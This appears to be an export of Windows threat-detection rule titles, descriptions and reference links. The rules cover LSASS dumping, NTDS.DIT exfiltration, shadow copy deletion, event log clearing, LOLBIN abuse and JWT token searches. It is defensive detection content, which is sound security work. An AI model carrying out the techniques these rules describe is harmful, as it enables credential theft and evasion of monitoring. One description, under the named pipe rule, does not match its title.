https://twitter.com/hexacorn/status/1448037865435320323, https://twitter.com/Gal_B1t/status/1062971006078345217 |
Suspicious Copy From or To System Directory |
Detects a suspicious copy operation that tries to copy a program from system (System32, SysWOW64, WinSxS) directories to another on disk.
Often used to move LOLBINs such as 'certutil' or 'desktopimgdownldr' to a different location with a different name in order to bypass detections based on locations.
|
https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Copy From Or To Admin Share Or Sysvol Folder |
Detects a copy command or a copy utility execution to or from an Admin share or remote |
https://twitter.com/SBousseaden/status/1211636381086339073, https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view, https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ |
Potential Crypto Mining Activity |
Detects command line parameters or strings often used by crypto miners |
https://www.poolwatch.io/coin/monero |
LOL-Binary Copied From System Directory |
Detects a suspicious copy operation that tries to copy a known LOLBIN from system (System32, SysWOW64, WinSxS) directories to another on disk in order to bypass detections based on locations.
|
https://www.hybrid-analysis.com/sample/8da5b75b6380a41eee3a399c43dfe0d99eeefaa1fd21027a07b1ecaa4cd96fdd?environmentId=120, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html, https://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/ |
Potential Data Exfiltration Activity Via CommandLine Tools |
Detects the use of various CLI utilities exfiltrating data via web requests |
https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ |
Raccine Uninstall |
Detects commands that indicate a Raccine removal from an end system. Raccine is a free ransomware protection tool. |
https://github.com/Neo23x0/Raccine |
Suspicious Double Extension File Execution |
Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns |
https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html, https://twitter.com/blackorbird/status/1140519090961825792 |
Suspicious Parent Double Extension File Execution |
Detect execution of suspicious double extension files in ParentCommandLine |
https://www.virustotal.com/gui/file/7872d8845a332dce517adae9c3389fde5313ff2fed38c2577f3b498da786db68/behavior, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa |
Suspicious Download from Office Domain |
Detects suspicious ways to download files from Microsoft domains that are used to store attachments in Emails or OneNote documents |
https://twitter.com/an0n_r0/status/1474698356635193346?s=12, https://twitter.com/mrd0x/status/1475085452784844803?s=12 |
DumpStack.log Defender Evasion |
Detects the use of the filename DumpStack.log to evade Microsoft Defender |
https://twitter.com/mrd0x/status/1479094189048713219 |
Always Install Elevated MSI Spawned Cmd And Powershell |
Detects Windows Installer service (msiexec.exe) spawning "cmd" or "powershell" |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-50-638.jpg |
Suspicious Electron Application Child Processes |
Detects suspicious child processes of electron apps (teams, discord, slack, etc.). This could be a potential sign of ".asar" file tampering (See reference section for more information) or binary execution proxy through specific CLI arguments (see related rule)
|
https://taggart-tech.com/quasar-electron/, https://github.com/mttaggart/quasar, https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf |
Potentially Suspicious Electron Application CommandLine |
Detects potentially suspicious CommandLine of electron apps (teams, discord, slack, etc.). This could be a sign of abuse to proxy execution through a signed binary. |
https://positive.security/blog/ms-officecmd-rce, https://lolbas-project.github.io/lolbas/Binaries/Teams/, https://lolbas-project.github.io/lolbas/Binaries/Msedge/, https://lolbas-project.github.io/lolbas/Binaries/msedgewebview2/, https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf, https://chromium.googlesource.com/chromium/chromium/+/master/content/public/common/content_switches.cc |
Elevated System Shell Spawned From Uncommon Parent Location |
Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from a uncommon parent location. |
https://github.com/Wh04m1001/SysmonEoP |
Hidden Powershell in Link File Pattern |
Detects events that appear when a user click on a link file with a powershell command in it |
https://www.x86matthew.com/view_post?id=embed_exe_lnk |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 2 |
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. |
Internal Research |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 |
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. |
Internal Research |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 3 |
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. |
Internal Research |
ETW Logging Tamper In .NET Processes Via CommandLine |
Detects changes to environment variables related to ETW logging via the CommandLine.
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.
|
https://twitter.com/_xpn_/status/1268712093928378368, https://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr, https://github.com/dotnet/runtime/blob/ee2355c801d892f2894b0f7b14a20e6cc50e0e54/docs/design/coreclr/jit/viewing-jit-dumps.md#setting-configuration-variables, https://github.com/dotnet/runtime/blob/f62e93416a1799aecc6b0947adad55a0d9870732/src/coreclr/src/inc/clrconfigvalues.h#L35-L38, https://github.com/dotnet/runtime/blob/7abe42dc1123722ed385218268bb9fe04556e3d3/src/coreclr/src/inc/clrconfig.h#L33-L39, https://github.com/dotnet/runtime/search?p=1&q=COMPlus_&unscoped_q=COMPlus_, https://bunnyinside.com/?term=f71e8cb9c76a, http://managed670.rssing.com/chan-5590147/all_p1.html, https://github.com/dotnet/runtime/blob/4f9ae42d861fcb4be2fcd5d3d55d5f227d30e723/docs/coding-guidelines/clr-jit-coding-conventions.md#1412-disabling-code, https://i.blackhat.com/EU-21/Wednesday/EU-21-Teodorescu-Veni-No-Vidi-No-Vici-Attacks-On-ETW-Blind-EDRs.pdf |
Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4 |
Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. |
Internal Research |
ETW Trace Evasion Activity |
Detects command line activity that tries to clear or disable any ETW trace log which could be a sign of logging evasion.
|
https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://abuse.io/lockergoga.txt, https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63 |
Suspicious Eventlog Clearing or Configuration Change Activity |
Detects the clearing or configuration tampering of EventLog using utilities such as "wevtutil", "powershell" and "wmic".
This technique were seen used by threat actors and ransomware strains in order to evade defenses.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md, https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil, https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee, https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/ |
Potentially Suspicious EventLog Recon Activity Using Log Query Utilities |
Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs.
This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.
|
http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/, https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-144a, https://www.group-ib.com/blog/apt41-world-tour-2021/, https://labs.withsecure.com/content/dam/labs/docs/f-secureLABS-tlp-white-lazarus-threat-intel-report2.pdf, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.diagnostics/get-winevent?view=powershell-7.3, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-eventlog?view=powershell-5.1, http://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/, https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil |
Potentially Suspicious Execution From Parent Process In Public Folder |
Detects a potentially suspicious execution of a parent process located in the "\Users\Public" folder executing a child process containing references to shell or scripting binaries and commandlines.
|
https://redcanary.com/blog/blackbyte-ransomware/ |
Process Execution From A Potentially Suspicious Folder |
Detects a potentially suspicious execution from an uncommon folder. |
https://github.com/mbevilacqua/appcompatprocessor/blob/6c847937c5a836e2ce2fe2b915f213c345a3c389/AppCompatSearch.txt, https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses, https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/, https://github.com/ThreatHuntingProject/ThreatHunting/blob/cb22598bb70651f88e0285abc8d835757d2cb596/hunts/suspicious_process_creation_via_windows_event_logs.md |
Suspicious File Characteristics Due to Missing Fields |
Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe |
https://securelist.com/muddywater/88059/, https://www.virustotal.com/#/file/276a765a10f98cda1a38d3a31e7483585ca3722ecad19d784441293acf1b7beb/detection |
Suspicious Reconnaissance Activity Via GatherNetworkInfo.VBS |
Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine |
https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs, https://www.mandiant.com/resources/blog/trojanized-windows-installers-ukrainian-government |
Potential Hidden Directory Creation Via NTFS INDEX_ALLOCATION Stream - CLI |
Detects command line containing reference to the "::$index_allocation" stream, which can be used as a technique to prevent access to folders or files from tooling such as "explorer.exe" or "powershell.exe"
|
https://twitter.com/pfiatde/status/1681977680688738305, https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/, https://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/, https://github.com/redcanaryco/atomic-red-team/blob/5c3b23002d2bbede3c07e7307165fc2a235a427d/atomics/T1564.004/T1564.004.md#atomic-test-5---create-hidden-directory-via-index_allocation, https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fscc/c54dec26-1551-4d3a-a0ea-4fa40f848eb3 |
Writing Of Malicious Files To The Fonts Folder |
Monitors for the hiding possible malicious files in the C:\Windows\Fonts\ location. This folder doesn't require admin privillege to be written and executed from. |
https://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/ |
Potential Homoglyph Attack Using Lookalike Characters |
Detects the presence of unicode characters which are homoglyphs, or identical in appearance, to ASCII letter characters.
This is used as an obfuscation and masquerading techniques. Only "perfect" homoglyphs are included; these are characters that
are indistinguishable from ASCII characters and thus may make excellent candidates for homoglyph attack characters.
|
https://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish, http://www.irongeek.com/homoglyph-attack-generator.php |
Execution Of Non-Existing File |
Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process) |
https://pentestlaboratories.com/2021/12/08/process-ghosting/ |
Base64 MZ Header In CommandLine |
Detects encoded base64 MZ header in the commandline |
https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/ |
Potential WinAPI Calls Via CommandLine |
Detects the use of WinAPI Functions via the commandline. As seen used by threat actors via the tool winapiexec |
https://twitter.com/m417z/status/1566674631788007425 |
Potentially Suspicious JWT Token Search Via CLI |
Detects possible search for JWT tokens via CLI by looking for the string "eyJ0eX" or "eyJhbG".
This string is used as an anchor to look for the start of the JWT token used by microsoft office and similar apps.
|
https://mrd0x.com/stealing-tokens-from-office-applications/ |
Local Accounts Discovery |
Local accounts, System Owner/User discovery using operating systems utilities |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md |
LOLBIN Execution From Abnormal Drive |
Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO. |
https://thedfirreport.com/2021/12/13/diavol-ransomware/, https://www.scythe.io/library/threat-emulation-qakbot, https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/ |
LSASS Dump Keyword In CommandLine |
Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process.
|
https://github.com/Hackndo/lsassy, https://medium.com/@markmotig/some-ways-to-dump-lsass-exe-c4a75fdc49bf, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/credential_access_lsass_memdump_file_created.toml, https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/, https://github.com/helpsystems/nanodump, https://github.com/CCob/MirrorDump |
Potential File Download Via MS-AppInstaller Protocol Handler |
Detects usage of the "ms-appinstaller" protocol handler via command line to potentially download arbitrary files via AppInstaller.EXE
The downloaded files are temporarly stored in ":\Users\%username%\AppData\Local\Packages\Microsoft.DesktopAppInstaller_8wekyb3d8bbwe\AC\INetCache\"
|
https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/ |
Suspicious Network Command |
Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1016/T1016.md#atomic-test-1---system-network-configuration-discovery-on-windows |
Suspicious Scan Loop Network |
Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md, https://ss64.com/nt/for.html, https://ss64.com/ps/foreach-object.html |
Potential Network Sniffing Activity Using Network Tools |
Detects potential network sniffing via use of network tools such as "tshark", "windump".
Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.
An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
|
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md |
Execution of Suspicious File Type Extension |
Detects whether the image specified in a process creation event doesn't refer to an ".exe" (or other known executable extension) file. This can be caused by process ghosting or other unorthodox methods to start a process.
This rule might require some initial baselining to align with some third party tooling in the user environment.
|
https://pentestlaboratories.com/2021/12/08/process-ghosting/ |
Non-privileged Usage of Reg or Powershell |
Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry |
https://image.slidesharecdn.com/kheirkhabarovoffzonefinal-181117201458/95/hunting-for-privilege-escalation-in-windows-environment-20-638.jpg |
Process Launched Without Image Name |
Detect the use of processes with no name (".exe"), which can be used to evade Image-based detections. |
https://www.huntress.com/blog/fake-browser-updates-lead-to-boinc-volunteer-computing-software |
Suspicious Process Patterns NTDS.DIT Exfil |
Detects suspicious process patterns used in NTDS.DIT exfiltration |
https://www.ired.team/offensive-security/credential-access-and-credential-dumping/ntds.dit-enumeration, https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/, https://pentestlab.blog/tag/ntds-dit/, https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Gather/Copy-VSS.ps1, https://github.com/zcgonvh/NTDSDumpEx, https://github.com/rapid7/metasploit-framework/blob/d297adcebb5c1df6fe30b12ca79b161deb71571c/data/post/powershell/NTDSgrab.ps1, https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1 |
Potentially Suspicious Call To Win32_NTEventlogFile Class |
Detects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script |
https://learn.microsoft.com/en-us/previous-versions/windows/desktop/legacy/aa394225(v=vs.85) |
Use Short Name Path in Command Line |
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232 |
Use Short Name Path in Image |
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/frack113/status/1555830623633375232 |
Use NTFS Short Name in Command Line |
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid command-line detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984 |
Use NTFS Short Name in Image |
Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image based detection |
https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/, https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10), https://twitter.com/jonasLyk/status/1555914501802921984 |
Obfuscated IP Download Activity |
Detects use of an encoded/obfuscated version of an IP address (hex, octal...) in an URL combined with a download command |
https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608, https://twitter.com/fr0s7_/status/1712780207105404948 |
Obfuscated IP Via CLI |
Detects usage of an encoded/obfuscated version of an IP address (hex, octal, etc.) via command line |
https://h.43z.one/ipconverter/, https://twitter.com/Yasser_Elsnbary/status/1553804135354564608 |
Suspicious Process Parents |
Detects suspicious parent processes that should not have any children or should only have a single possible child program |
https://twitter.com/x86matthew/status/1505476263464607744?s=12, https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b |
Private Keys Reconnaissance Via CommandLine Tools |
Adversaries may search for private key certificate files on compromised systems for insecurely stored credential |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md |
Potential PowerShell Execution Via DLL |
Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll.
This detection assumes that PowerShell commands are passed via the CommandLine.
|
https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md |
Suspicious RunAs-Like Flag Combination |
Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools |
https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html |
Privilege Escalation via Named Pipe Impersonation |
Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity. |
https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html |
Windows Processes Suspicious Parent Directory |
Detect suspicious parent processes of well-known Windows processes |
https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2, https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/, https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf |
Suspicious Program Names |
Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md |
Recon Information for Export with Command Prompt |
Once established within a system or network, an adversary may use automated techniques for collecting internal data. |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md |
Suspicious Process Execution From Fake Recycle.Bin Folder |
Detects process execution from a fake recycle bin folder, often used to avoid security solution. |
https://www.mandiant.com/resources/blog/infected-usb-steal-secrets, https://unit42.paloaltonetworks.com/cloaked-ursa-phishing/ |
Suspicious Redirection to Local Admin Share |
Detects a suspicious output redirection to the local admins share, this technique is often found in malicious scripts or hacktool stagers |
https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/, http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html |
Potential Remote Desktop Tunneling |
Detects potential use of an SSH utility to establish RDP over a reverse SSH Tunnel. This can be used by attackers to enable routing of network packets that would otherwise not reach their intended destination. |
https://www.elastic.co/guide/en/security/current/potential-remote-desktop-tunneling-detected.html |
Potential Defense Evasion Via Right-to-Left Override |
Detects the presence of the "u202+E" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.
This is used as an obfuscation and masquerading techniques.
|
https://redcanary.com/blog/right-to-left-override/, https://www.malwarebytes.com/blog/news/2014/01/the-rtlo-method, https://unicode-explorer.com/c/202E |
Script Interpreter Execution From Suspicious Folder |
Detects a suspicious script execution in temporary folders or folders accessible by environment variables |
https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military, https://learn.microsoft.com/en-us/windows/win32/shell/csidl |
Suspicious Script Execution From Temp Folder |
Detects a suspicious script executions from temporary folder |
https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ |
Sensitive File Access Via Volume Shadow Copy Backup |
Detects a command that accesses the VolumeShadowCopy in order to extract sensitive files such as the Security or SAM registry hives or the AD database (ntds.dit)
|
https://twitter.com/vxunderground/status/1423336151860002816?s=20, https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection, https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/ |
Suspicious New Service Creation |
Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths |
https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md, https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html |
Suspicious Service Binary Directory |
Detects a service binary running in a suspicious directory |
https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/ |
Shadow Copies Creation Using Operating Systems Utilities |
Shadow Copies creation using operating systems utilities, possible credential access |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/tutorial-for-ntds-goodness-vssadmin-wmis-ntdsdit-system/ |
Suspicious Windows Service Tampering |
Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts
|
https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg, https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955 |
System File Execution Location Anomaly |
Detects the execution of a Windows system binary that is usually located in the system folder from an uncommon location.
|
https://twitter.com/GelosSnake/status/934900723426439170, https://asec.ahnlab.com/en/39828/ |
Shadow Copies Deletion Using Operating Systems Utilities |
Shadow Copies deletion using operating systems utilities |
https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://blog.talosintelligence.com/2017/05/wannacry.html, https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/, https://www.bleepingcomputer.com/news/security/why-everyone-should-disable-vssadmin-exe-now/, https://www.hybrid-analysis.com/sample/ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa?environmentId=100, https://github.com/Neo23x0/Raccine#the-process, https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/gen_ransomware_command_lines.yar, https://redcanary.com/blog/intelligence-insights-october-2021/, https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware |
Windows Shell/Scripting Processes Spawning Suspicious Programs |
Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc. |
https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html |
Suspicious SYSTEM User Process Creation |
Detects a suspicious process creation as SYSTEM user (suspicious program or command line parameter) |
Internal Research, https://tools.thehacker.recipes/mimikatz/modules |
Suspicious SYSVOL Domain Group Policy Access |
Detects Access to Domain Group Policies stored in SYSVOL |
https://adsecurity.org/?p=2288, https://www.hybrid-analysis.com/sample/f2943f5e45befa52fb12748ca7171d30096e1d4fc3c365561497c618341299d5?environmentId=100 |
Tasks Folder Evasion |
The Tasks folder in system32 and syswow64 are globally writable paths.
Adversaries can take advantage of this and load or influence any script hosts or ANY .NET Application
in Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr
|
https://twitter.com/subTee/status/1216465628946563073, https://gist.github.com/am0nsec/8378da08f848424e4ab0cc5b317fdd26 |
Process Creation Using Sysnative Folder |
Detects process creation events that use the Sysnative folder (common for CobaltStrike spawns) |
https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/ |
Suspicious Userinit Child Process |
Detects a suspicious child process of userinit |
https://twitter.com/SBousseaden/status/1139811587760562176 |
Malicious Windows Script Components File Execution by TAEF Detection |
Windows Test Authoring and Execution Framework (TAEF) framework allows you to run automation by executing tests files written on different languages (C, C#, Microsoft COM Scripting interfaces
Adversaries may execute malicious code (such as WSC file with VBScript, dll and so on) directly by running te.exe
|
https://lolbas-project.github.io/lolbas/OtherMSBinaries/Te/, https://twitter.com/pabraeken/status/993298228840992768, https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/ |
Malicious PE Execution by Microsoft Visual Studio Debugger |
There is an option for a MS VS Just-In-Time Debugger "vsjitdebugger.exe" to launch specified executable and attach a debugger.
This option may be used adversaries to execute malicious code by signed verified binary.
The debugger is installed alongside with Microsoft Visual Studio package.
|
https://twitter.com/pabraeken/status/990758590020452353, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/, https://learn.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019 |
Weak or Abused Passwords In CLI |
Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI.
An example would be a threat actor creating a new user via the net command and providing the password inline
|
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments, https://thedfirreport.com/2022/09/26/bumblebee-round-two/, https://www.microsoft.com/en-us/security/blog/2022/10/25/dev-0832-vice-society-opportunistic-ransomware-campaigns-impacting-us-education-sector/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708 |
Usage Of Web Request Commands And Cmdlets |
Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine |
https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/, https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell, https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps |
WhoAmI as Parameter |
Detects a suspicious process command line that uses whoami as first parameter (as e.g. used by EfsPotato) |
https://twitter.com/blackarrowsec/status/1463805700602224645?s=12 |
Execution via WorkFolders.exe |
Detects using WorkFolders.exe to execute an arbitrary control.exe |
https://twitter.com/elliotkillick/status/1449812843772227588 |
Suspect Svchost Activity |
It is extremely abnormal for svchost.exe to spawn without any CLI arguments and is normally observed when a malicious process spawns the process and injects code into the process memory space. |
https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2 |
Suspicious Process Masquerading As SvcHost.EXE |
Detects a suspicious process that is masquerading as the legitimate "svchost.exe" by naming its binary "svchost.exe" and executing from an uncommon location.
Adversaries often disguise their malicious binaries by naming them after legitimate system processes like "svchost.exe" to evade detection.
|
https://tria.ge/240731-jh4crsycnb/behavioral2, https://redcanary.com/blog/threat-detection/process-masquerading/ |
Terminal Service Process Spawn |
Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708) |
https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/ |
Uncommon Svchost Parent Process |
Detects an uncommon svchost parent process |
Internal Research |
Permission Check Via Accesschk.EXE |
Detects the usage of the "Accesschk" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges |
